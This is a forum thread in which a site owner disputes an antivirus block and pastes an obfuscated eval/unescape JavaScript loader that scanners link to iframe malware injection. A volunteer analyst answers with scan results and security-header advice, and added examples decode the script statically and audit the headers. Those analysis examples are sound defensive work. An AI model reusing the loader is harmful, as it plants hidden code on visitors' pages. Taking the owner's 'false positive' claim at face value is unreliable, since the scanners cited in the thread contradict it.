website blocked [flyff-atomix.com]

Hello everyone, I have a problem with your antivirus.
I did an analysis of my website http://www.flyff-atomix.com
on virustotal.com, here: https://www.virustotal.com/fr/url/8f4bb7bfbff30c698d0aa2eb719d096386fceea691b54a4e173ffc9696ae913a/analysis/1418460443/

The problem is that my site is blocked because I used an encoding system to protect access to certain images, to prevent them from being copied from me.

The code is a false positive

[[<script type='text/javascript' language='javascript' > 
 
<!-- 
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%76%64%35%65%32%37%34%65%28%73%29%20%7b
%09%76%61%72%20%72%20%3d%20%22%22%3b
%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%32%38%34%38%38%30%31%22%29%3b
%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b
%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%33%35%37%32%33%22%29%3b
%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b
%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%32%29%3b
%09%7d
%09%72%65%74%75%72%6e%20%72%3b
%7d
'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%76%64%35%65%32%37%34%65%28%27') + '%38%62%6a%7b%24%60%68%64%76%70%38%26%69%61%67%67%64%72%21%46%39%65%6e%7f%20%66%68%67%74%76%39%21%68%76%6a%74%62%69%77%63%6a%66%27%46%3b%37%61%68%7d%47%3c%65%6d%7c%23%66%68%66%73%72%3c%21%69%73%6a%77%61%6a%77%63%6b%61%33%27%45%39%61%21%6c%70%66%6b%39%21%37%23%43%3b%6c%6d%6a%24%71%75%66%39%21%37%6c%6c%66%6e%65%76%37%76%6a%79%61%6b%67%7f%68%63%60%32%6a%6d%6c%25%21%63%6b%65%72%76%3a%23%68%64%65%62%66%77%29%6b%6d%60%73%21%36%42%3d%37%67%41%3d%37%63%6d%7f%43%3b%36%64%68%7e%4422848801%36%34%31%33%36%35%36' + unescape('%27%29%29%3b'));
 
 
 </script>]]

So I decided to disable the encoding, which gives:

<div class="header">
<div class="logocircle"></div><div class="logocircle2"><a href="/"><img src="/images/pixel_vide.gif" class="header-lien"></a></div>
</div>

Sincerely, John
I wish you could upgrade your database to resolve this issue as quickly
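
A static decode of the script posted above, as an added example that is not part of the original post: it re-implements the unpacking routine (split marker, digit key, XOR, subtract 2) without eval or document.write, then checks the result for iframes, scripts and off-site URLs. The names pctDecode, unpack and triage are chosen for this example; the packed string, marker and key suffix are copied from the posted script.

```javascript
// Added example: decode the packed document.write() argument without running it.
// Nothing is eval()'d and no DOM is touched; the routine is rebuilt by hand.

// Percent-decode %XX byte escapes, as the legacy unescape() does for this input.
function pctDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Mirror of the posted vd5e274e(): split on the marker, rebuild the digit key,
// then XOR each character with one key digit and subtract 2.
function unpack(arg, marker, keySuffix) {
  const [body, keyHead] = arg.split(marker);
  const s = pctDecode(body);
  const k = pctDecode(keyHead + keySuffix);
  let out = "";
  for (let i = 0; i < s.length; i++) {
    out += String.fromCharCode((parseInt(k.charAt(i % k.length), 10) ^ s.charCodeAt(i)) - 2);
  }
  return out;
}

// Quick triage of the markup the script would have written into the page.
function triage(html) {
  return {
    iframe: /<iframe\b/i.test(html),
    script: /<script\b/i.test(html),
    // src/href pointing at "//host" or "scheme://host" (off-site candidates)
    externalUrl: /(?:src|href)\s*=\s*["']?(?:[a-z][a-z0-9+.-]*:)?\/\//i.test(html),
  };
}

// Argument of vd5e274e() exactly as it appears in the second eval() of the post.
const PACKED = "%38%62%6a%7b%24%60%68%64%76%70%38%26%69%61%67%67%64%72%21%46%39%65%6e%7f%20%66%68%67%74%76%39%21%68%76%6a%74%62%69%77%63%6a%66%27%46%3b%37%61%68%7d%47%3c%65%6d%7c%23%66%68%66%73%72%3c%21%69%73%6a%77%61%6a%77%63%6b%61%33%27%45%39%61%21%6c%70%66%6b%39%21%37%23%43%3b%6c%6d%6a%24%71%75%66%39%21%37%6c%6c%66%6e%65%76%37%76%6a%79%61%6b%67%7f%68%63%60%32%6a%6d%6c%25%21%63%6b%65%72%76%3a%23%68%64%65%62%66%77%29%6b%6d%60%73%21%36%42%3d%37%67%41%3d%37%63%6d%7f%43%3b%36%64%68%7e%4422848801%36%34%31%33%36%35%36";

const decoded = unpack(PACKED, "22848801", "735723");
console.log(decoded);
console.log(triage(decoded));
```

The decode covers only this one script block; other detections reported for the site are outside what it can confirm or rule out.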

The code is a false positive
Yea .....we always hear that ;)

Virustotal does not scan the site for malware, it is just a check against blacklists

Sucuri report http://sitecheck.sucuri.net/results/www.flyff-atomix.com

Malware entry: MW:IFRAME:HD28 http://labs.sucuri.net/db/malware/malware-entry-mwiframehd28

If you think this is wrong, report it to avast lab here www.support.avast.com

The code there is flagged in the browser as a malformed or illegal request attack code, also resembles XSS attack.
Google produces a 400 error.
An Injection check produces: Suspicious Text before HTML

*, *:hover{cursor: url("/images/curseur.png"), auto;} a:hover{cursor: url("/images/curseur/curseurbleu.png"), pointer;}

Excessive header info proliferation alert for apache/2.4.9 (win64) php/5.5.12
PHP 5.5.12 suffers from a memory corruption vulnerability.

Site is flagged by Bitdefender’s TrafficLight as malicious.
Sucuri gives 6 instances of iFrame malware - MW:IFRAME:HD28 (for analogue detection issue → https://forum.avast.com/index.php?topic=127154.10 )
Quote from Alain Purcaru on error: undefined function vd5e274e → http://jsunpack.jeek.org/?report=7c15bf2c1e70c8b19bd754e2a81d55539b341547
(open link with NoScript extension active and inside a VM/sandbox, for security research only)

Although PHP does not require variable declaration, it does recommend it in order to avoid some security vulnerabilities or bugs where one would forget to give a value to a variable that he will use later in the script. What PHP does in the case of undeclared variables is issue a very low level error, E_NOTICE, one that is not even reported by default,

XSS vuln: Results from scanning URL: htxp://www.flyff-atomix.com/javascript/javascript.js
Number of sources found: 41
Number of sinks found: 17

Your code

<div class="header"> <div class="logocircle"></div><div class="logocircle2"><a href="/"><img src="/images/pixel_vide.gif" class="header-lien"></a></div> </div>

still gives alerts by malware Script Detector as XSS attack code related.

polonus

@legiux,

You should be a bit aware of your coding especially while with your hosting you are not as secure as “Fort Knox”
so to say as far as the header configuration there shows.
| Result | Category | Name | Actual Value | Our Recommendation |
|---|---|---|---|---|
| Missing | Framing | X-Frame-Options | | Use ‘sameorigin’ |
| Missing | Transport | Strict-Transport-Security | | Use ‘max-age=31536000; includeSubDomains’ |
| Missing | Content | X-Content-Type-Options | | Use ‘nosniff’ |
| Correct | Content | Content-Type | text/html; charset=UTF-8 | Use ‘text/html;charset=utf-8’ |
| Missing | XSS | X-XSS-Protection | | Use ‘1; mode=block’ |
| Warning | Cookies | Set-Cookie | PHPSESSID=3h6eucsn3j…3dd6plv7lc05; path=/ | Add ‘secure; httponly;’ |
| Correct | Caching | Cache-Control | no-store, no-cache, …check=0, pre-check=0 | Use ‘no-cache, no-store, must-revalidate’ |
| Correct | Caching | Pragma | no-cache | Use ‘no-cache’ |
| Correct | Caching | Expires | Thu, 19 Nov 1981 08:52:00 GMT | Use ‘-1’. Currently, expiration is current time minus -1043473382 seconds. |
| Missing | Access Control | X-Permitted-Cross-Domain-Policies | | Use ‘master-only’ |
| Missing | Content Security Policy | Content-Security-Policy | | Try Content-Security-Policy-Report-Only to start. Include default-src ‘self’, avoid ‘unsafe-inline’ and ‘unsafe-eval’ |
| Warning | Server Information | Server | Apache/2.4.9 (Win64) PHP/5.5.12 | Avoid version numbers |
| Warning | Server Information | X-Powered-By | PHP/5.5.12 | Avoid header |

Well, that is up to those that host the server this site is on - for recommendations see details here: http://cyh.herokuapp.com/cyh
where the 3rd party scan came from.

polonus
(volunteer website analyst and website error-hunter)
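
The header findings in the report above, re-checked in code, as an added example that is not part of the original post and not the scanner's own code. The sample response is constructed from the table's "Actual Value" column (the cookie value is a placeholder and the elided Cache-Control value is left out); parseHeaders and audit are names chosen for this example.

```javascript
// Added example: flag the missing or leaky response headers named in the report.
// RAW is a constructed sample built from the table, not a capture from the site.
const RAW = [
  "HTTP/1.1 200 OK",
  "Server: Apache/2.4.9 (Win64) PHP/5.5.12",
  "X-Powered-By: PHP/5.5.12",
  "Content-Type: text/html; charset=UTF-8",
  "Set-Cookie: PHPSESSID=PLACEHOLDER; path=/",
  "Pragma: no-cache",
  "Expires: Thu, 19 Nov 1981 08:52:00 GMT",
].join("\r\n");

// Headers the report lists as "Missing".
const REQUIRED = ["x-frame-options", "strict-transport-security", "x-content-type-options",
  "x-xss-protection", "x-permitted-cross-domain-policies", "content-security-policy"];

// Parse a raw response head into a case-insensitive multimap (Set-Cookie may repeat).
function parseHeaders(raw) {
  const map = new Map();
  for (const line of raw.split(/\r?\n/).slice(1)) {
    const i = line.indexOf(":");
    if (i < 1) continue;
    const name = line.slice(0, i).trim().toLowerCase();
    if (!map.has(name)) map.set(name, []);
    map.get(name).push(line.slice(i + 1).trim());
  }
  return map;
}

function audit(raw) {
  const h = parseHeaders(raw);
  const findings = [];
  for (const name of REQUIRED) if (!h.has(name)) findings.push(`Missing ${name}`);
  for (const c of h.get("set-cookie") || []) {
    const attrs = c.split(";").slice(1).map((a) => a.trim().toLowerCase());
    for (const flag of ["secure", "httponly"]) {
      if (!attrs.includes(flag)) findings.push(`Warning set-cookie ${c.split("=")[0]} lacks ${flag}`);
    }
  }
  // Version strings in Server and any X-Powered-By header disclose the stack.
  if (/\d+\.\d+/.test((h.get("server") || [""])[0])) findings.push("Warning server discloses version");
  if (h.has("x-powered-by")) findings.push("Warning x-powered-by present");
  return findings;
}

console.log(audit(RAW).join("\n"));
```

Strict-Transport-Security only takes effect on responses served over HTTPS, and the Secure cookie flag likewise assumes the site is reachable over HTTPS.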